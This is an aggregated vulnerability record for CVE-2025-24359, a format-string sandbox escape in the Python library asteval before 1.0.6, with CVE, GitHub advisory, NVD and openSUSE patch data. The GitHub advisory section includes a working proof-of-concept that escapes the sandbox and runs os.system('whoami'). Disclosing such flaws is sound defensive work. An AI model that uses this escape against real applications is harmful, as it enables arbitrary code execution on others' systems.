cvelistv5 - cve-2025-24359

CVE-2025-24359 (GCVE-0-2025-24359)

Vulnerability from cvelistv5 – Published: 2025-01-24 16:52 – Updated: 2025-02-12 20:01

Title

ASTEVAL Vulnerable to Maliciously Crafted Format Strings Leading to Sandbox Escape

Summary

ASTEVAL is an evaluator of Python expressions and statements. Prior to version 1.0.6, if an attacker can control the input to the `asteval` library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library. The vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the `on_formattedvalue` value uses the dangerous format method of the str class. The code allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties. Version 1.0.6 fixes this issue.

Severity ?

8.4 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-134 - Use of Externally-Controlled Format String
CWE-749 - Exposed Dangerous Method or Function

Assigner

GitHub_M

References

URL

Tags

	https://github.com/lmfit/asteval/security/advisor…	x_refsource_CONFIRM
	https://github.com/lmfit/asteval/blob/cfb57f0beeb…	x_refsource_MISC
	https://lucumr.pocoo.org/2016/12/29/careful-with-…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	lmfit	asteval	Affected: < 1.0.6

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-24359",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-01-24T17:28:13.184358Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-02-12T20:01:18.799Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "asteval",
          "vendor": "lmfit",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.0.6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "ASTEVAL is an evaluator of Python expressions and statements. Prior to version 1.0.6, if an attacker can control the input to the `asteval` library, they can bypass asteval\u0027s restrictions and execute arbitrary Python code in the context of the application using the library. The vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the `on_formattedvalue` value uses the dangerous format method of the str class. The code allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties. Version 1.0.6 fixes this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 8.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-134",
              "description": "CWE-134: Use of Externally-Controlled Format String",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-749",
              "description": "CWE-749: Exposed Dangerous Method or Function",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-01-25T00:54:58.877Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7"
        },
        {
          "name": "https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507"
        },
        {
          "name": "https://lucumr.pocoo.org/2016/12/29/careful-with-str-format",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://lucumr.pocoo.org/2016/12/29/careful-with-str-format"
        }
      ],
      "source": {
        "advisory": "GHSA-3wwr-3g9f-9gc7",
        "discovery": "UNKNOWN"
      },
      "title": "ASTEVAL Vulnerable to Maliciously Crafted Format Strings Leading to Sandbox Escape"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-24359",
    "datePublished": "2025-01-24T16:52:44.304Z",
    "dateReserved": "2025-01-20T15:18:26.989Z",
    "dateUpdated": "2025-02-12T20:01:18.799Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-24359\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-01-24T17:15:16.197\",\"lastModified\":\"2025-01-24T17:15:16.197\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"ASTEVAL is an evaluator of Python expressions and statements. Prior to version 1.0.6, if an attacker can control the input to the `asteval` library, they can bypass asteval\u0027s restrictions and execute arbitrary Python code in the context of the application using the library. The vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the `on_formattedvalue` value uses the dangerous format method of the str class. The code allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties. Version 1.0.6 fixes this issue.\"},{\"lang\":\"es\",\"value\":\"ASTEVAL es un evaluador de expresiones y declaraciones de Python. Antes de la versi\u00f3n 1.0.6, si un atacante pod\u00eda controlar la entrada de `asteval` librer\u00eda, pod\u00eda eludir las restricciones de asteval y ejecutar c\u00f3digo Python arbitrario en el contexto de la aplicaci\u00f3n utilizando tlibrer\u00edaary. La vulnerabilidad tiene su ra\u00edz en la forma en que `asteval` realiza el manejo de los nodos AST `FormattedValue`. En particular, el valor `on_formattedvalue` utiliza el m\u00e9todo de formato peligroso de la clase str. El c\u00f3digo permite a un atacante manipular el valor de la cadena utilizada en la llamada peligrosa `fmt.format(__fstring__=val)`. Esta vulnerabilidad se puede explotar para acceder a atributos protegidos activando intencionalmente una excepci\u00f3n `AttributeError`. El atacante puede entonces capturar la excepci\u00f3n y utilizar su atributo `obj` para obtener acceso arbitrario a propiedades de objetos confidenciales o protegidas. La versi\u00f3n 1.0.6 corrige este problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.4,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.5,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-134\"},{\"lang\":\"en\",\"value\":\"CWE-749\"}]}],\"references\":[{\"url\":\"https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://lucumr.pocoo.org/2016/12/29/careful-with-str-format\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"ASTEVAL Vulnerable to Maliciously Crafted Format Strings Leading to Sandbox Escape\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-134\", \"lang\": \"en\", \"description\": \"CWE-134: Use of Externally-Controlled Format String\", \"type\": \"CWE\"}]}, {\"descriptions\": [{\"cweId\": \"CWE-749\", \"lang\": \"en\", \"description\": \"CWE-749: Exposed Dangerous Method or Function\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"LOCAL\", \"availabilityImpact\": \"HIGH\", \"baseScore\": 8.4, \"baseSeverity\": \"HIGH\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"scope\": \"UNCHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7\"}, {\"name\": \"https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507\"}, {\"name\": \"https://lucumr.pocoo.org/2016/12/29/careful-with-str-format\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://lucumr.pocoo.org/2016/12/29/careful-with-str-format\"}], \"affected\": [{\"vendor\": \"lmfit\", \"product\": \"asteval\", \"versions\": [{\"version\": \"\u003c 1.0.6\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-01-25T00:54:58.877Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"ASTEVAL is an evaluator of Python expressions and statements. Prior to version 1.0.6, if an attacker can control the input to the `asteval` library, they can bypass asteval\u0027s restrictions and execute arbitrary Python code in the context of the application using the library. The vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the `on_formattedvalue` value uses the dangerous format method of the str class. The code allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties. Version 1.0.6 fixes this issue.\"}], \"source\": {\"advisory\": \"GHSA-3wwr-3g9f-9gc7\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-24359\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-01-24T17:28:13.184358Z\"}}}], \"providerMetadata\": {\"shortName\": \"CISA-ADP\", \"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"dateUpdated\": \"2025-02-12T19:55:36.870Z\"}, \"title\": \"CISA ADP Vulnrichment\"}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-24359\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2025-01-20T15:18:26.989Z\", \"datePublished\": \"2025-01-24T16:52:44.304Z\", \"dateUpdated\": \"2025-01-25T00:54:58.877Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-3WWR-3G9F-9GC7

Vulnerability from github – Published: 2025-01-24 18:45 – Updated: 2025-01-25 00:54

Summary

ASTEVAL Allows Maliciously Crafted Format Strings to Lead to Sandbox Escape

Details

Summary

If an attacker can control the input to the asteval library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library.

Details

The vulnerability is rooted in how asteval performs handling of FormattedValue AST nodes. In particular, the on_formattedvalue value uses the dangerous format method of the str class, as shown in the vulnerable code snippet below:

    def on_formattedvalue(self, node): # ('value', 'conversion', 'format_spec')
        "formatting used in f-strings"
        val = self.run(node.value)
        fstring_converters = {115: str, 114: repr, 97: ascii}
        if node.conversion in fstring_converters:
            val = fstring_converters[node.conversion](val)
        fmt = '{__fstring__}'
        if node.format_spec is not None:
            fmt = f'{{__fstring__:{self.run(node.format_spec)}}}'
        return fmt.format(__fstring__=val)

The code above allows an attacker to manipulate the value of the string used in the dangerous call fmt.format(__fstring__=val). This vulnerability can be exploited to access protected attributes by intentionally triggering an AttributeError exception. The attacker can then catch the exception and use its obj attribute to gain arbitrary access to sensitive or protected object properties.

PoC

The following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the whoami command on the host machine:

from asteval import Interpreter
aeval = Interpreter()
code = """
# def lender():
#     ga

def pwn():
    try:
        f"{dict.mro()[1]:'\\x7B__fstring__.__getattribute__.s\\x7D'}"
    except Exception as ga:
        ga = ga.obj
        sub = ga(dict.mro()[1],"__subclasses__")()
        importer = None
        for i in sub:
            if "BuiltinImporter" in str(i):
                importer = i.load_module
                break
        os = importer("os")
        os.system("whoami")

# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below
# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works

pwn()
"""
aeval(code)

Severity ?

8.4 (High)


                  
                    CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.5"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "asteval"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-24359"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-134",
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-01-24T18:45:30Z",
    "nvd_published_at": "2025-01-24T17:15:16Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nIf an attacker can control the input to the `asteval` library, they can bypass asteval\u0027s restrictions and execute arbitrary Python code in the context of the application using the library.\n\n### Details\nThe vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the [`on_formattedvalue`](https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507) value uses the [dangerous format method of the str class](https://lucumr.pocoo.org/2016/12/29/careful-with-str-format/), as shown in the vulnerable code snippet below:\n\n```py\n    def on_formattedvalue(self, node): # (\u0027value\u0027, \u0027conversion\u0027, \u0027format_spec\u0027)\n        \"formatting used in f-strings\"\n        val = self.run(node.value)\n        fstring_converters = {115: str, 114: repr, 97: ascii}\n        if node.conversion in fstring_converters:\n            val = fstring_converters[node.conversion](val)\n        fmt = \u0027{__fstring__}\u0027\n        if node.format_spec is not None:\n            fmt = f\u0027{{__fstring__:{self.run(node.format_spec)}}}\u0027\n        return fmt.format(__fstring__=val)\n```\n\nThe code above allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties.\n\n### PoC\nThe following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:\n\n```py\nfrom asteval import Interpreter\naeval = Interpreter()\ncode = \"\"\"\n# def lender():\n#     ga\n    \ndef pwn():\n    try:\n        f\"{dict.mro()[1]:\u0027\\\\x7B__fstring__.__getattribute__.s\\\\x7D\u0027}\"\n    except Exception as ga:\n        ga = ga.obj\n        sub = ga(dict.mro()[1],\"__subclasses__\")()\n        importer = None\n        for i in sub:\n            if \"BuiltinImporter\" in str(i):\n                importer = i.load_module\n                break\n        os = importer(\"os\")\n        os.system(\"whoami\")\n\n# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below\n# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works\n        \npwn()\n\"\"\"\naeval(code)\n\n```",
  "id": "GHSA-3wwr-3g9f-9gc7",
  "modified": "2025-01-25T00:54:49Z",
  "published": "2025-01-24T18:45:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24359"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lmfit/asteval/commit/45bb47533f7abb5479618ae7f6a809215700dcb2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lmfit/asteval"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507"
    },
    {
      "type": "WEB",
      "url": "https://lucumr.pocoo.org/2016/12/29/careful-with-str-format"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ASTEVAL Allows Maliciously Crafted Format Strings to Lead to Sandbox Escape"
}

FKIE_CVE-2025-24359

Vulnerability from fkie_nvd - Published: 2025-01-24 17:15 - Updated: 2025-01-24 17:15

Severity ?

8.4 (High) - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507
	security-advisories@github.com	https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7
	security-advisories@github.com	https://lucumr.pocoo.org/2016/12/29/careful-with-str-format

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "ASTEVAL is an evaluator of Python expressions and statements. Prior to version 1.0.6, if an attacker can control the input to the `asteval` library, they can bypass asteval\u0027s restrictions and execute arbitrary Python code in the context of the application using the library. The vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the `on_formattedvalue` value uses the dangerous format method of the str class. The code allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties. Version 1.0.6 fixes this issue."
    },
    {
      "lang": "es",
      "value": "ASTEVAL es un evaluador de expresiones y declaraciones de Python. Antes de la versi\u00f3n 1.0.6, si un atacante pod\u00eda controlar la entrada de `asteval` librer\u00eda, pod\u00eda eludir las restricciones de asteval y ejecutar c\u00f3digo Python arbitrario en el contexto de la aplicaci\u00f3n utilizando tlibrer\u00edaary. La vulnerabilidad tiene su ra\u00edz en la forma en que `asteval` realiza el manejo de los nodos AST `FormattedValue`. En particular, el valor `on_formattedvalue` utiliza el m\u00e9todo de formato peligroso de la clase str. El c\u00f3digo permite a un atacante manipular el valor de la cadena utilizada en la llamada peligrosa `fmt.format(__fstring__=val)`. Esta vulnerabilidad se puede explotar para acceder a atributos protegidos activando intencionalmente una excepci\u00f3n `AttributeError`. El atacante puede entonces capturar la excepci\u00f3n y utilizar su atributo `obj` para obtener acceso arbitrario a propiedades de objetos confidenciales o protegidas. La versi\u00f3n 1.0.6 corrige este problema."
    }
  ],
  "id": "CVE-2025-24359",
  "lastModified": "2025-01-24T17:15:16.197",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 8.4,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.5,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-01-24T17:15:16.197",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://lucumr.pocoo.org/2016/12/29/careful-with-str-format"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-134"
        },
        {
          "lang": "en",
          "value": "CWE-749"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

OPENSUSE-SU-2025:14701-1

Vulnerability from csaf_opensuse - Published: 2025-01-27 00:00 - Updated: 2025-01-27 00:00

Summary

python311-asteval-1.0.6-1.1 on GA media

Notes

Title of the patch

python311-asteval-1.0.6-1.1 on GA media

Description of the patch

These are all security issues fixed in the python311-asteval-1.0.6-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames

openSUSE-Tumbleweed-2025-14701

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "python311-asteval-1.0.6-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the python311-asteval-1.0.6-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2025-14701",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_14701-1.json"
      },
      {
        "category": "self",
        "summary": "URL for openSUSE-SU-2025:14701-1",
        "url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/RCIYZNYY34TMKJK6SAESDFFCWXTAMH4M/"
      },
      {
        "category": "self",
        "summary": "E-Mail link for openSUSE-SU-2025:14701-1",
        "url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/RCIYZNYY34TMKJK6SAESDFFCWXTAMH4M/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-24359 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-24359/"
      }
    ],
    "title": "python311-asteval-1.0.6-1.1 on GA media",
    "tracking": {
      "current_release_date": "2025-01-27T00:00:00Z",
      "generator": {
        "date": "2025-01-27T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2025:14701-1",
      "initial_release_date": "2025-01-27T00:00:00Z",
      "revision_history": [
        {
          "date": "2025-01-27T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-asteval-1.0.6-1.1.aarch64",
                "product": {
                  "name": "python311-asteval-1.0.6-1.1.aarch64",
                  "product_id": "python311-asteval-1.0.6-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-asteval-1.0.6-1.1.aarch64",
                "product": {
                  "name": "python312-asteval-1.0.6-1.1.aarch64",
                  "product_id": "python312-asteval-1.0.6-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-asteval-1.0.6-1.1.aarch64",
                "product": {
                  "name": "python313-asteval-1.0.6-1.1.aarch64",
                  "product_id": "python313-asteval-1.0.6-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-asteval-1.0.6-1.1.ppc64le",
                "product": {
                  "name": "python311-asteval-1.0.6-1.1.ppc64le",
                  "product_id": "python311-asteval-1.0.6-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python312-asteval-1.0.6-1.1.ppc64le",
                "product": {
                  "name": "python312-asteval-1.0.6-1.1.ppc64le",
                  "product_id": "python312-asteval-1.0.6-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python313-asteval-1.0.6-1.1.ppc64le",
                "product": {
                  "name": "python313-asteval-1.0.6-1.1.ppc64le",
                  "product_id": "python313-asteval-1.0.6-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-asteval-1.0.6-1.1.s390x",
                "product": {
                  "name": "python311-asteval-1.0.6-1.1.s390x",
                  "product_id": "python311-asteval-1.0.6-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python312-asteval-1.0.6-1.1.s390x",
                "product": {
                  "name": "python312-asteval-1.0.6-1.1.s390x",
                  "product_id": "python312-asteval-1.0.6-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python313-asteval-1.0.6-1.1.s390x",
                "product": {
                  "name": "python313-asteval-1.0.6-1.1.s390x",
                  "product_id": "python313-asteval-1.0.6-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-asteval-1.0.6-1.1.x86_64",
                "product": {
                  "name": "python311-asteval-1.0.6-1.1.x86_64",
                  "product_id": "python311-asteval-1.0.6-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-asteval-1.0.6-1.1.x86_64",
                "product": {
                  "name": "python312-asteval-1.0.6-1.1.x86_64",
                  "product_id": "python312-asteval-1.0.6-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-asteval-1.0.6-1.1.x86_64",
                "product": {
                  "name": "python313-asteval-1.0.6-1.1.x86_64",
                  "product_id": "python313-asteval-1.0.6-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-asteval-1.0.6-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-asteval-1.0.6-1.1.aarch64"
        },
        "product_reference": "python311-asteval-1.0.6-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-asteval-1.0.6-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-asteval-1.0.6-1.1.ppc64le"
        },
        "product_reference": "python311-asteval-1.0.6-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-asteval-1.0.6-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-asteval-1.0.6-1.1.s390x"
        },
